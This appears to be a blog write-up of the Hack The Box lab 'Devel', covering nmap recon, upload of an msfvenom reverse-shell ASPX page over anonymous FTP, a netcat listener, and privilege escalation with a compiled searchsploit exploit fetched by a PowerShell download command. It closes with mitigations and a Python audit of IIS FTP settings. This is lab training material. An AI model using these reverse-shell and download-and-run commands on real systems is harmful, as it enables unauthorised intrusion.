Hack the Box — Devel

One of the first HTB boxes I solved a few months ago from the TJ Null List in preparation for the PNPT and OSCP.

Solving the “Devel” box can be divided into 3 main steps:

1. Recon
   • conduct some recon using nmap or rustscan
   • look into MS-IIS/7.5 and google a bit about executable file types
2. Enumeration
   • use the anonymous FTP access
3. Exploitation

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.5

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.5

nmap -sU -O -oA nmap/udp 10.10.10.5

Enum

We have some web-facing material and we can try to go to these pages.

I think “evil” is left over from someone else working on the box 😅

Exploitation

Create reverse-shell.aspx with msfvenom

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.37 LPORT=4444 -o reverse-shell.aspx

Push reverse-shell.aspx to the webserver over the anonymous FTP access found during enumeration

Start a listener with netcat in another terminal

nc -nlvp 4444

Visit http://10.10.10.5/reverse-shell.aspx to trigger the payload

Catch the shell on the listener

Priv Esc

Find an exploit that works

searchsploit -m 40564

# this mirrors (copies) the exploit source into our current directory

Compile it

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Serve it over HTTP from the attacking machine (port 443 in the download command below)

Get it with powershell or certutil

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:443/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Once bad.exe is run, the priv esc is immediate.

Mitigation: how could this attack have been stopped?

  1. Disable anonymous access to the FTP server
  2. Configure the FTP server to only allow downloads
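As an added example that is not part of the original post, here is a small Python audit that parses an IIS applicationHost.config (a constructed fragment in the IIS 7.5 layout, not taken from the box) and flags the settings the chain above depends on: anonymous FTP authentication, Write access for everyone or the anonymous user, and an FTP root that is also the web root. The site names and physical paths are assumptions.

```python
import xml.etree.ElementTree as ET

def make_config(anonymous, permissions, ftp_root):
    """Constructed applicationHost.config fragment in the IIS 7.5 layout (not from the box)."""
    return f"""<configuration>
 <system.applicationHost><sites>
  <site name="Default Web Site"><application path="/">
   <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" /></application></site>
  <site name="Default FTP Site"><application path="/">
   <virtualDirectory path="/" physicalPath="{ftp_root}" /></application>
   <ftpServer><security><authentication><anonymousAuthentication enabled="{anonymous}" />
   </authentication></security></ftpServer></site>
 </sites></system.applicationHost>
 <location path="Default FTP Site"><system.ftpServer><security><authorization>
  <add accessType="Allow" users="*" permissions="{permissions}" />
 </authorization></security></system.ftpServer></location></configuration>"""

def _root_path(site):
    vdir = site.find("application/virtualDirectory")
    return (vdir.get("physicalPath", "") if vdir is not None else "").lower().rstrip("\\")

def audit_ftp(xml_text):
    """Return (site, finding) pairs for FTP sites that would allow the chain used on Devel."""
    root = ET.fromstring(xml_text)
    sites = list(root.iter("site"))
    # Web roots keyed by path, so an FTP site writing straight into wwwroot can be spotted.
    web_roots = {_root_path(s): s.get("name") for s in sites if s.find("ftpServer") is None}
    findings = []
    for site in sites:
        ftp = site.find("ftpServer")
        if ftp is None:
            continue
        name = site.get("name")
        anon = ftp.find("security/authentication/anonymousAuthentication")
        if anon is not None and anon.get("enabled", "false").lower() == "true":
            findings.append((name, "anonymous authentication enabled"))
        # FTP authorization rules sit in <location path="site name">; users "*" = everyone, "?" = anonymous.
        for loc in root.iter("location"):
            if loc.get("path") != name:
                continue
            for rule in loc.iter("add"):
                if (rule.get("accessType") == "Allow" and rule.get("users") in ("*", "?")
                        and "write" in rule.get("permissions", "").lower()):
                    findings.append((name, f"Write granted to users='{rule.get('users')}'"))
        shared = web_roots.get(_root_path(site))
        if shared:
            findings.append((name, f"FTP root is also the web root of '{shared}'"))
    return findings

WEAK = make_config("true", "Read, Write", "C:\\inetpub\\wwwroot")  # the Devel-style setup
HARDENED = make_config("false", "Read", "C:\\inetpub\\ftproot")   # both mitigations applied
```

Running the audit against WEAK reports all three findings, while HARDENED (anonymous access off, downloads only, FTP root separated from the web root) reports none.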

This post is licensed under CC BY 4.0 by the author.